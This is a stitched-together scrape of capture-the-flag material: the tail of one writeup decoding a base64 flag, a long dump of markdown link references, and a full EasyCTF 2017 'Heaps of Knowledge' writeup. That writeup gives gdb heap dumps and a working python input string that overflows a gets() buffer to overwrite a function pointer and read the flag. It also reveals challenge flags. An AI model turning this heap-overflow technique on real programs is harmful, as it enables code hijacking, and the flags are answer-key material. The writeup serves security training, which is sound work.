starting "U" is out of place, it shouldn't be there!___ Maybe that came from another random string, or whatever. But I tried to remove that 'U' and decode again... ``` python>>> base64.b64decode('QklUQ1RGe1M1IDAwMTQrODF9')'BITCTF{S5 0014+81}'``` Aha! __Win.__ __The flag was: `BITCTF{S5 0014+81}`__ [netcat]: https://en.wikipedia.org/wiki/Netcat[Wikipedia]: https://www.wikipedia.org/[Linux]: https://www.linux.com/[man page]: https://en.wikipedia.org/wiki/Man_page[man pages]: https://en.wikipedia.org/wiki/Man_page[man]: https://en.wikipedia.org/wiki/Man_page[PuTTY]: http://www.putty.org/[ssh]: https://en.wikipedia.org/wiki/Secure_Shell[Windows]: http://www.microsoft.com/en-us/windows[virtual machine]: https://en.wikipedia.org/wiki/Virtual_machine[operating system]:https://en.wikipedia.org/wiki/Operating_system[OS]: https://en.wikipedia.org/wiki/Operating_system[VMWare]: http://www.vmware.com/[VirtualBox]: https://www.virtualbox.org/[hostname]: https://en.wikipedia.org/wiki/Hostname[port number]: https://en.wikipedia.org/wiki/Port_%28computer_networking%29[port]: https://en.wikipedia.org/wiki/Port_%28computer_networking%29[ports]: https://en.wikipedia.org/wiki/Port_%28computer_networking%29[distribution]:https://en.wikipedia.org/wiki/Linux_distribution[Ubuntu]: http://www.ubuntu.com/[ISO]: https://en.wikipedia.org/wiki/ISO_image[standard streams]: https://en.wikipedia.org/wiki/Standard_streams[standard output]: https://en.wikipedia.org/wiki/Standard_streams[standard input]: https://en.wikipedia.org/wiki/Standard_streams[read]: http://ss64.com/bash/read.html[variable]: https://en.wikipedia.org/wiki/Variable_%28computer_science%29[command substitution]: http://www.tldp.org/LDP/abs/html/commandsub.html[permissions]: https://en.wikipedia.org/wiki/File_system_permissions[redirection]: http://www.tldp.org/LDP/abs/html/io-redirection.html[redirect]: http://www.tldp.org/LDP/abs/html/io-redirection.html[pipe]: http://www.tldp.org/LDP/abs/html/io-redirection.html[piped]: http://www.tldp.org/LDP/abs/html/io-redirection.html[piping]: http://www.tldp.org/LDP/abs/html/io-redirection.html[tmp]: http://www.tldp.org/LDP/Linux-Filesystem-Hierarchy/html/tmp.html[curl]: http://curl.haxx.se/[cl1p.net]: https://cl1p.net/[request]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html[POST request]: https://en.wikipedia.org/wiki/POST_%28HTTP%29[Python]: http://python.org/[interpreter]: https://en.wikipedia.org/wiki/List_of_command-line_interpreters[requests]: http://docs.python-requests.org/en/latest/[urllib]: https://docs.python.org/2/library/urllib.html[file handling with Python]: https://docs.python.org/2/tutorial/inputoutput.html#reading-and-writing-files[bash]: https://www.gnu.org/software/bash/[Assembly]: https://en.wikipedia.org/wiki/Assembly_language[the stack]: https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29[register]: http://www.tutorialspoint.com/assembly_programming/assembly_registers.htm[hex]: https://en.wikipedia.org/wiki/Hexadecimal[hexadecimal]: https://en.wikipedia.org/wiki/Hexadecimal[archive file]: https://en.wikipedia.org/wiki/Archive_file[zip file]: https://en.wikipedia.org/wiki/Zip_%28file_format%29[.zip]: https://en.wikipedia.org/wiki/Zip_%28file_format%29[gigabytes]: https://en.wikipedia.org/wiki/Gigabyte[GB]: https://en.wikipedia.org/wiki/Gigabyte[GUI]: https://en.wikipedia.org/wiki/Graphical_user_interface[Wireshark]: https://www.wireshark.org/[FTP]: https://en.wikipedia.org/wiki/File_Transfer_Protocol[client and server]: https://simple.wikipedia.org/wiki/Client-server[RETR]: http://cr.yp.to/ftp/retr.html[FTP server]: https://help.ubuntu.com/lts/serverguide/ftp-server.html[SFTP]: https://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol[SSL]: https://en.wikipedia.org/wiki/Transport_Layer_Security[encryption]: https://en.wikipedia.org/wiki/Encryption[HTML]: https://en.wikipedia.org/wiki/HTML[Flask]: http://flask.pocoo.org/[SQL]: https://en.wikipedia.org/wiki/SQL[and]: https://en.wikipedia.org/wiki/Logical_conjunction[Cyberstakes]: https://cyberstakesonline.com/[cat]: https://en.wikipedia.org/wiki/Cat_%28Unix%29[symbolic link]: https://en.wikipedia.org/wiki/Symbolic_link[ln]: https://en.wikipedia.org/wiki/Ln_%28Unix%29[absolute path]: https://en.wikipedia.org/wiki/Path_%28computing%29[CTF]: https://en.wikipedia.org/wiki/Capture_the_flag#Computer_security[Cyberstakes]: https://cyberstakesonline.com/[OverTheWire]: http://overthewire.org/[Leviathan]: http://overthewire.org/wargames/leviathan/[ls]: https://en.wikipedia.org/wiki/Ls[grep]: https://en.wikipedia.org/wiki/Grep[strings]: http://linux.die.net/man/1/strings[ltrace]: http://linux.die.net/man/1/ltrace[C]: https://en.wikipedia.org/wiki/C_%28programming_language%29[strcmp]: http://linux.die.net/man/3/strcmp[access]: http://pubs.opengroup.org/onlinepubs/009695399/functions/access.html[system]: http://linux.die.net/man/3/system[real user ID]: https://en.wikipedia.org/wiki/User_identifier[effective user ID]: https://en.wikipedia.org/wiki/User_identifier[brute force]: https://en.wikipedia.org/wiki/Brute-force_attack[brute-force]: https://en.wikipedia.org/wiki/Brute-force_attack[for loop]: https://en.wikipedia.org/wiki/For_loop[bash programming]: http://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO.html[Behemoth]: http://overthewire.org/wargames/behemoth/[command line]: https://en.wikipedia.org/wiki/Command-line_interface[command-line]: https://en.wikipedia.org/wiki/Command-line_interface[cli]: https://en.wikipedia.org/wiki/Command-line_interface[PHP]: https://php.net/[URL]: https://en.wikipedia.org/wiki/Uniform_Resource_Locator[TamperData]: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/[Firefox]: https://www.mozilla.org/en-US/firefox/new/?product=firefox-3.6.8&os=osx%E2%8C%A9=en-US[Caesar Cipher]: https://en.wikipedia.org/wiki/Caesar_cipher[Google Reverse Image Search]: https://www.google.com/imghp[PicoCTF]: https://picoctf.com/[JavaScript]: https://www.javascript.com/[base64]: https://en.wikipedia.org/wiki/Base64[client-side]: https://en.wikipedia.org/wiki/Client-side_scripting[client side]: https://en.wikipedia.org/wiki/Client-side_scripting[javascript:alert]: http://www.w3schools.com/js/js_popup.asp[Java]: https://www.java.com/en/[2147483647]: https://en.wikipedia.org/wiki/2147483647_%28number%29[XOR]: https://en.wikipedia.org/wiki/Exclusive_or[XOR cipher]: https://en.wikipedia.org/wiki/XOR_cipher[quipqiup.com]: http://www.quipqiup.com/[PDF]: https://en.wikipedia.org/wiki/Portable_Document_Format[pdfimages]: http://linux.die.net/man/1/pdfimages[ampersand]: https://en.wikipedia.org/wiki/Ampersand[URL encoding]: https://en.wikipedia.org/wiki/Percent-encoding[Percent encoding]: https://en.wikipedia.org/wiki/Percent-encoding[URL-encoding]: https://en.wikipedia.org/wiki/Percent-encoding[Percent-encoding]: https://en.wikipedia.org/wiki/Percent-encoding[endianness]: https://en.wikipedia.org/wiki/Endianness[ASCII]: https://en.wikipedia.org/wiki/ASCII[struct]: https://docs.python.org/2/library/struct.html[pcap]: https://en.wikipedia.org/wiki/Pcap[packet capture]: https://en.wikipedia.org/wiki/Packet_analyzer[HTTP]: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol[Wireshark filters]: https://wiki.wireshark.org/DisplayFilters[SSL]: https://en.wikipedia.org/wiki/Transport_Layer_Security[Assembly]: https://en.wikipedia.org/wiki/Assembly_language[Assembly Syntax]: https://en.wikipedia.org/wiki/X86_assembly_language#Syntax[Intel Syntax]: https://en.wikipedia.org/wiki/X86_assembly_language[Intel or AT&T]: http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm[AT&T syntax]: https://en.wikibooks.org/wiki/X86_Assembly/GAS_Syntax[GET request]: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Request_methods[GET requests]: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Request_methods[IP Address]: https://en.wikipedia.org/wiki/IP_address[IP Addresses]: https://en.wikipedia.org/wiki/IP_address[MAC Address]: https://en.wikipedia.org/wiki/MAC_address[session]: https://en.wikipedia.org/wiki/Session_%28computer_science%29[Cookie Manager+]: https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/[hexedit]: http://linux.die.net/man/1/hexedit[Google]: http://google.com/[Scapy]: http://www.secdev.org/projects/scapy/[ARP]: https://en.wikipedia.org/wiki/Address_Resolution_Protocol[UDP]: https://en.wikipedia.org/wiki/User_Datagram_Protocol[SQL injection]: https://en.wikipedia.org/wiki/SQL_injection[sqlmap]: http://sqlmap.org/[sqlite]: https://www.sqlite.org/[MD5]: https://en.wikipedia.org/wiki/MD5[OpenSSL]: https://www.openssl.org/[Burpsuite]:https://portswigger.net/burp/[Burpsuite.jar]:https://portswigger.net/burp/[Burp]:https://portswigger.net/burp/[NULL character]: https://en.wikipedia.org/wiki/Null_character[Format String Vulnerability]: http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf[printf]: http://pubs.opengroup.org/onlinepubs/009695399/functions/fprintf.html[argument]: https://en.wikipedia.org/wiki/Parameter_%28computer_programming%29[arguments]: https://en.wikipedia.org/wiki/Parameter_%28computer_programming%29[parameter]: https://en.wikipedia.org/wiki/Parameter_%28computer_programming%29[parameters]: https://en.wikipedia.org/wiki/Parameter_%28computer_programming%29[Vortex]: http://overthewire.org/wargames/vortex/[socket]: https://docs.python.org/2/library/socket.html[file descriptor]: https://en.wikipedia.org/wiki/File_descriptor[file descriptors]: https://en.wikipedia.org/wiki/File_descriptor[Forth]: https://en.wikipedia.org/wiki/Forth_%28programming_language%29[github]: https://github.com/[buffer overflow]: https://en.wikipedia.org/wiki/Buffer_overflow[try harder]: https://www.offensive-security.com/when-things-get-tough/[segmentation fault]: https://en.wikipedia.org/wiki/Segmentation_fault[seg fault]: https://en.wikipedia.org/wiki/Segmentation_fault[segfault]: https://en.wikipedia.org/wiki/Segmentation_fault[shellcode]: https://en.wikipedia.org/wiki/Shellcode[sploit-tools]: https://github.com/SaltwaterC/sploit-tools[Kali]: https://www.kali.org/[Kali Linux]: https://www.kali.org/[gdb]: https://www.gnu.org/software/gdb/[gdb tutorial]: http://www.unknownroad.com/rtfm/gdbtut/gdbtoc.html[payload]: https://en.wikipedia.org/wiki/Payload_%28computing%29[peda]: https://github.com/longld/peda[git]: https://git-scm.com/[home directory]: https://en.wikipedia.org/wiki/Home_directory[NOP slide]:https://en.wikipedia.org/wiki/NOP_slide[NOP]: https://en.wikipedia.org/wiki/NOP[examine]: https://sourceware.org/gdb/onlinedocs/gdb/Memory.html[stack pointer]: http://stackoverflow.com/questions/1395591/what-is-exactly-the-base-pointer-and-stack-pointer-to-what-do-they-point[little endian]: https://en.wikipedia.org/wiki/Endianness[big endian]: https://en.wikipedia.org/wiki/Endianness[endianness]: https://en.wikipedia.org/wiki/Endianness[pack]: https://docs.python.org/2/library/struct.html#struct.pack[ash]:https://en.wikipedia.org/wiki/Almquist_shell[dash]: https://en.wikipedia.org/wiki/Almquist_shell[shell]: https://en.wikipedia.org/wiki/Shell_%28computing%29[pwntools]: https://github.com/Gallopsled/pwntools[colorama]: https://pypi.python.org/pypi/colorama[objdump]: https://en.wikipedia.org/wiki/Objdump[UPX]: http://upx.sourceforge.net/[64-bit]: https://en.wikipedia.org/wiki/64-bit_computing[breakpoint]: https://en.wikipedia.org/wiki/Breakpoint[stack frame]: http://www.cs.umd.edu/class/sum2003/cmsc311/Notes/Mips/stack.html[format string]: http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html[format specifiers]: http://web.eecs.umich.edu/~bartlett/printf.html[format specifier]: http://web.eecs.umich.edu/~bartlett/printf.html[variable expansion]: https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html[base pointer]: http://stackoverflow.com/questions/1395591/what-is-exactly-the-base-pointer-and-stack-pointer-to-what-do-they-point[dmesg]: https://en.wikipedia.org/wiki/Dmesg[Android]: https://www.android.com/[.apk]:https://en.wikipedia.org/wiki/Android_application_package[decompiler]: https://en.wikipedia.org/wiki/Decompiler[decompile Java code]: http://www.javadecompilers.com/[jadx]: https://github.com/skylot/jadx[.img]: https://en.wikipedia.org/wiki/IMG_%28file_format%29[binwalk]: http://binwalk.org/[JPEG]: https://en.wikipedia.org/wiki/JPEG[JPG]: https://en.wikipedia.org/wiki/JPEG[disk image]: https://en.wikipedia.org/wiki/Disk_image[foremost]: http://foremost.sourceforge.net/[eog]: https://wiki.gnome.org/Apps/EyeOfGnome[function pointer]: https://en.wikipedia.org/wiki/Function_pointer[machine code]: https://en.wikipedia.org/wiki/Machine_code[compiled language]: https://en.wikipedia.org/wiki/Compiled_language[compiler]: https://en.wikipedia.org/wiki/Compiler[scripting language]: https://en.wikipedia.org/wiki/Scripting_language[scripts]: https://en.wikipedia.org/wiki/Scripting_language[script]: https://en.wikipedia.org/wiki/Scripting_language[shell-storm.org]: http://shell-storm.org/[shell-storm]:http://shell-storm.org/[shellcode database]: http://shell-storm.org/shellcode/[gdb-peda]: https://github.com/longld/peda[x86]: https://en.wikipedia.org/wiki/X86[Intel x86]: https://en.wikipedia.org/wiki/X86[sh]: https://en.wikipedia.org/wiki/Bourne_shell[/bin/sh]: https://en.wikipedia.org/wiki/Bourne_shell[SANS]: https://www.sans.org/[Holiday Hack Challenge]: https://holidayhackchallenge.com/[USCGA]: http://uscga.edu/[United States Coast Guard Academy]: http://uscga.edu/[US Coast Guard Academy]: http://uscga.edu/[Academy]: http://uscga.edu/[Coast Guard Academy]: http://uscga.edu/[Hackfest]: https://www.sans.org/event/pen-test-hackfest-2015[SSID]: https://en.wikipedia.org/wiki/Service_set_%28802.11_network%29[DNS]: https://en.wikipedia.org/wiki/Domain_Name_System[Python:base64]: https://docs.python.org/2/library/base64.html[OpenWRT]: https://openwrt.org/[node.js]: https://nodejs.org/en/[MongoDB]: https://www.mongodb.org/[Mongo]: https://www.mongodb.org/[SuperGnome 01]: http://52.2.229.189/[Shodan]: https://www.shodan.io/[SuperGnome 02]: http://52.34.3.80/[SuperGnome 03]: http://52.64.191.71/[SuperGnome 04]: http://52.192.152.132/[SuperGnome 05]: http://54.233.105.81/[Local file inclusion]: http://hakipedia.com/index.php/Local_File_Inclusion[LFI]: http://hakipedia.com/index.php/Local_File_Inclusion[PNG]: http://www.libpng.org/pub/png/[.png]: http://www.libpng.org/pub/png/[Remote Code Execution]: https://en.wikipedia.org/wiki/Arbitrary_code_execution[RCE]: https://en.wikipedia.org/wiki/Arbitrary_code_execution[GNU]: https://www.gnu.org/[regular expression]: https://en.wikipedia.org/wiki/Regular_expression[regular expressions]: https://en.wikipedia.org/wiki/Regular_expression[uniq]: https://en.wikipedia.org/wiki/Uniq[sort]: https://en.wikipedia.org/wiki/Sort_%28Unix%29[binary data]: https://en.wikipedia.org/wiki/Binary_data[binary]: https://en.wikipedia.org/wiki/Binary[automation is divine]: https://www.youtube.com/watch?v=36AA3JGRP9s[repos]:https://help.ubuntu.com/community/Repositories/Ubuntu[repo]:https://help.ubuntu.com/community/Repositories/Ubuntu[repository]:https://help.ubuntu.com/community/Repositories/Ubuntu[repositories]: https://help.ubuntu.com/community/Repositories/Ubuntu[hex dump]: https://en.wikipedia.org/wiki/Hex_dump[hexdump]: https://en.wikipedia.org/wiki/Hex_dump[xxd]: http://linuxcommand.org/man_pages/xxd1.html[mkdir]: https://en.wikipedia.org/wiki/Mkdir[file]: https://en.wikipedia.org/wiki/File_%28command%29[gzip]: http://www.gzip.org/[file extension]: https://en.wikipedia.org/wiki/Filename_extension[bzip]: http://www.bzip.org/[bzip2]: http://www.bzip.org/[tar]: https://en.wikipedia.org/wiki/Tar_%28computing%29[tar command]: http://linuxcommand.org/man_pages/tar1.html[private key]: https://help.ubuntu.com/community/SSH/OpenSSH/Keys[s_client]: https://www.openssl.org/docs/manmaster/apps/s_client.html[nmap]: https://nmap.org/[IP address]: https://en.wikipedia.org/wiki/IP_address[RSA]: https://en.wikipedia.org/wiki/RSA_(cryptosystem)[ssh private key]: https://help.ubuntu.com/community/SSH/OpenSSH/Keys[file permissions]: https://www.linux.com/learn/understanding-linux-file-permissions[octal file permission]: http://www.cyberciti.biz/faq/how-linux-file-permissions-work/[octal file permissions]: http://www.cyberciti.biz/faq/how-linux-file-permissions-work/[chmod]: https://en.wikipedia.org/wiki/Chmod[diff]: http://man7.org/linux/man-pages/man1/diff.1.html[.bashrc]: http://unix.stackexchange.com/questions/129143/what-is-the-purpose-of-bashrc-and-how-does-it-work[bashrc]: http://unix.stackexchange.com/questions/129143/what-is-the-purpose-of-bashrc-and-how-does-it-work[setuid]: https://en.wikipedia.org/wiki/Setuid[user id]: https://en.wikipedia.org/wiki/User_identifier[effective user id]: https://en.wikipedia.org/wiki/User_identifier#Effective_user_ID[cron]: https://en.wikipedia.org/wiki/Cron[file extension]: https://en.wikipedia.org/wiki/Filename_extension[file extensions]: https://en.wikipedia.org/wiki/Filename_extension[bash script]: https://linuxconfig.org/bash-scripting-tutorial[bash script]: https://linuxconfig.org/bash-scripting-tutorial[bash scripts]: https://linuxconfig.org/bash-scripting-tutorial[shebang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[she-bang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[sha-bang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[shabang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[sha bang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[nano]: https://en.wikipedia.org/wiki/GNU_nano[text editor]: https://en.wikipedia.org/wiki/Text_editor[whoami]: https://en.wikipedia.org/wiki/Whoami[echo]: https://en.wikipedia.org/wiki/Echo_(command)[md5sum]: http://www.tutorialspoint.com/unix_commands/md5sum.htm[checksum]: https://en.wikipedia.org/wiki/Checksum[hash]: https://en.wikipedia.org/wiki/Cryptographic_hash_function[cut]: https://en.wikipedia.org/wiki/Cut_(Unix)[daemon]: https://en.wikipedia.org/wiki/Daemon_(computing)[temporary directory]: https://en.wikipedia.org/wiki/Temporary_folder[temp directory]: https://en.wikipedia.org/wiki/Temporary_folder[temp folder]: https://en.wikipedia.org/wiki/Temporary_folder[temporary folder]: https://en.wikipedia.org/wiki/Temporary_folder[seq]: http://www.cyberciti.biz/tips/tag/seq-command[/etc/passwd]: https://en.wikipedia.org/wiki/Passwd#Password_file[more]: https://en.wikipedia.org/wiki/More_(command)[vi]: https://en.wikipedia.org/wiki/Vi[vim]: http://www.vim.org/[caesar cipher]: https://en.wikipedia.org/wiki/Caesar_cipher[vignere cipher]: https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher[substitution cipher]: https://en.wikipedia.org/wiki/Substitution_cipher[DNA]: https://en.wikipedia.org/wiki/Nucleic_acid_sequence[Python bytecode]: http://security.coverity.com/blog/2014/Nov/understanding-python-bytecode.html[uncompyle]: https://github.com/gstarnberger/uncompyle[Easy Python Decompiler]: https://github.com/aliansi/Easy-Python-Decompiler-v1.3.2[marshal]: https://docs.python.org/2/library/marshal.html[IDLE]: https://en.wikipedia.org/wiki/IDLE[bytecode]: http://whatis.techtarget.com/definition/bytecode[dis]: https://docs.python.org/2/library/dis.html[rot13]: https://en.wikipedia.org/wiki/ROT13[calendar]: https://docs.python.org/2/library/calendar.html[datetime]: https://docs.python.org/2/library/datetime.html[primefac]: https://pypi.python.org/pypi/primefac[re]: https://docs.python.org/2/library/re.html[IDA pro]: https://www.hex-rays.com/products/ida/[IDA]: https://www.hex-rays.com/products/ida/[QR Code]: https://en.wikipedia.org/wiki/QR_code[RGB]: https://en.wikipedia.org/wiki/RGB_color_model[RGB color]: https://en.wikipedia.org/wiki/RGB_color_model[exiftool]: http://www.sno.phy.queensu.ca/~phil/exiftool/[robots.txt]: http://www.robotstxt.org/[XSS]: https://en.wikipedia.org/wiki/Cross-site_scripting[cross-site scripting]: https://en.wikipedia.org/wiki/Cross-site_scripting[cross site scripting]: https://en.wikipedia.org/wiki/Cross-site_scripting[cookie catcher]: http://hackwithstyle.blogspot.com/2011/11/what-is-cookie-catcher-and-how-to-get.html[johnhammond.org]: http://johnhammond.org[HTTP cookie]: https://en.wikipedia.org/wiki/HTTP_cookie[HTTP cookies]: https://en.wikipedia.org/wiki/HTTP_cookie[cookie]: https://en.wikipedia.org/wiki/HTTP_cookie[cookies]: https://en.wikipedia.org/wiki/HTTP_cookie[HTTP GET]: http://www.w3schools.com/Tags/ref_httpmethods.asp[tee]: https://en.wikipedia.org/wiki/Tee_(command)[reverse engineering]: https://en.wikipedia.org/wiki/Reverse_engineering[cryptography]: https://en.wikipedia.org/wiki/Cryptography[crypto]: https://en.wikipedia.org/wiki/Cryptography[sed]: https://en.wikipedia.org/wiki/Sed[padding]: https://en.wikipedia.org/wiki/Padding_(cryptography)[xortool]: https://github.com/hellman/xortool[XOR Cracker]: https://wiremask.eu/tools/xor-cracker/
# Heaps of Knowledge - 420 Points Can you pwn this? Navigate to /problems/heaps_of_knowledge/ on the shell server and read flag.txt. [Binary](https://github.com/EasyCTF/easyctf-2017-problems/blob/master/heaps_of_knowledge/heaps_of_knowledge?raw=true) ### Solution ###### Writeup by VoidMercy from phsst We were given a binary. We run it to see what it does.It prompts you for a book name, then there are three options: ```Please enter the title of the book you would like to write: AAAAYou have started writing the book 'AAAA'. Please select an option to get started!1. Edit chapter2. Delete chapter3. Publish book``` After experimenting with this program, you find out that you can only create a chapter starting from 1, 2, 3 and so on. Also you can only delete an existing chapter otherwise the program will exit. Then, publish prints the title, and the content of each chapter. Then, if you edit an existing chapter, it changes it's content. Because this problem is called Heaps of Knowledge, we can be fairly certain this will be a heap exploit.We can run this in gdb, enter a random book title, let's say "AAAA" then view our heap using: >info proc mappings ```(gdb) x/50wx 0x804c0000x804c000: 0x00000000 0x00000011 0x0804c018 0x000000000x804c010: 0x00000000 0x00000011 0x41414141 0x000000000x804c020: 0x00000000 0x00020fe1 0x00000000 0x000000000x804c030: 0x00000000 0x00000000 0x00000000 0x00000000``` We can see that the first section consists of an address to the actual title of the book, contained in another section. Let's do the same after adding a couple of chapters. Let's set chapter 1's name to BBBB, and it's content to CCCC while chapter 2's name to DDDD and it's content to EEEE ```0x804c000: 0x00000000 0x00000011 0x0804c018 0x000000020x804c010: 0x0804c028 0x00000011 0x41414141 0x000000000x804c020: 0x00000000 0x00000019 0x00000000 0x0804c0600x804c030: 0x0804c040 0x0804c050 0x0804872f 0x000000110x804c040: 0x42424242 0x0000000a 0x00000000 0x000000110x804c050: 0x43434343 0x0000000a 0x00000000 0x000000190x804c060: 0x0804c028 0x00000000 0x0804c078 0x0804c0880x804c070: 0x0804872f 0x00000011 0x44444444 0x0000000a0x804c080: 0x00000000 0x00000011 0x45454545 0x0000000a0x804c090: 0x00000000 0x00020f71 0x00000000 0x00000000``` We can see that this is very similar in structure. The section containing addresses for chapters, however, contains three addresses: the chapter's name, chapter's content, and huh? what is the last one? We can quickly view it using >x 0x0804872f ```0x804872f <print_chapter>: 0x83e58955``` We see that this is an address pointing to the function to print this chapter. From this knowledge, we can surmise that the edit chapter edits content at the chapter's content's address (for chapter 1 in this case, it is 0x0804c050). Then the publish function most likely calls the function at the print chapter address stored on the heap. (for chapter 1 it is 0x0804872f). Next, we look into the disassembly of the binary. I used IDA to disassemble this binary. ![](https://github.com/VoidMercy/EasyCTF-Writeups-2017/blob/master/binexploit/Heaps-of-Knowledge/screenshot1.PNG) It uses gets() to get the content of the chapter text! This means we can overflow the heap because gets does not check the length of the string you give it. Using this, we can pretty much construct the heap to whatever we want it to look like.We then see a give_flag function so we look into it. It reads the flag file and prints it's contents. However, there's a catch ![](https://github.com/VoidMercy/EasyCTF-Writeups-2017/blob/master/binexploit/Heaps-of-Knowledge/image.png) success needs to be set to 0x13371337 in order for the flag file to be read. And we see that success is set to just 0x1337 in default. However, we can use the edit chapter content function of the program to change the address of chapter content and write to that address. Then if we set the address of print chapter to give_flag, publishing the book should give us our flag. I used gdb to get the address of give_flag, and IDA for success: >p give_flag ```$2 = {<text variable, no debug info>} 0x804879a <give_flag>``` and success = 0x0804b054 Now I used gdb to create two chapters, and manually edit the heap to what I want it to look like using: >set {int}address=value Here is the state of the heap: ```0x804c000: 0x00000000 0x00000011 0x0804c018 0x000000020x804c010: 0x0804c028 0x00000011 0x41414141 0x424242420x804c020: 0x00000000 0x00000019 0x00000000 0x0804c0600x804c030: 0x0804c040 0x0804c050 0x0804879a <give_flag> 0x000000110x804c040: 0x43434343 0x0000000a 0x00000000 0x000000110x804c050: 0x44444444 0x0000000a 0x00000000 0x000000190x804c060: 0x0804c028 0x00000000 0x0804c078 0x0804b054 <success>0x804c070: 0x0804872f 0x00000011 0x45454545 0x0000000a0x804c080: 0x00000000 0x00000011 0x46464646 0x0000000a0x804c090: 0x00000000 0x00020f71 0x00000000 0x000000000x804c0a0: 0x00000000 0x00000000 0x00000000 0x000000000x804c0b0: 0x00000000 0x00000000 0x00000000 0x000000000x804c0c0: 0x00000000 0x00000000 0x00000000 0x000000000x804c0d0: 0x00000000 0x00000000 0x00000000 0x000000000x804c0e0: 0x00000000 0x00000000 0x00000000 0x000000000x804c0f0: 0x00000000 0x00000000 0x00000000 0x000000000x804c100: 0x00000000 0x00000000 0x00000000 0x000000000x804c110: 0x00000000 0x00000000``` Then after editing the contents of chapter 2 to 0x13371337 and publishing, the contents of flag.txt was successfully printed. Now we know the requirements for the exploit:1) Change address of chapter content to address of success2) Edit that chapter's content to 0x133713373) Change address of print chapter to address of give_flag4) Publish Now, we just have to construct an exploit. I decided to create 2 chapters and overflow the second chapter's addresses through the first chapter's content. The key input order will be: AAAA 1 1 BBBB CCCC 1 2 DDDD EEEE 1 1 "C" * 24 + 0x804c078 + 0x0804b054 + 0x804879a 1 2 0x13371337 3 I printed the non printable ascii characters with python and piped the input into the binary python -c "print 'AAAA\n1\n1\nBBBB\nCCCC\n1\n2\nDDDD\nEEEE\n1\n1\n' + 'C'*24 + '\x78\xc0\x04\x08' + '\x54\xb0\x04\x08' + '\x9a\x87\x04\x08\n' + '1\n2\n' + '\x37\x13\x37\x13\n' + '3\n'" | ./heaps_of_knowledge ## Flag >easyctf{4r3nT_u_hav1ng_h34pz_0f_Fun?}
[https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ctfs/blob/master/crypto/easyctf2017-hash-on-hash.md](https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ctfs/blob/master/crypto/easyctf2017-hash-on-hash.md)
[https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ctfs/blob/master/forensics/easyctf2017-ogrewatch.md](https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ctfs/blob/master/forensics/easyctf2017-ogrewatch.md)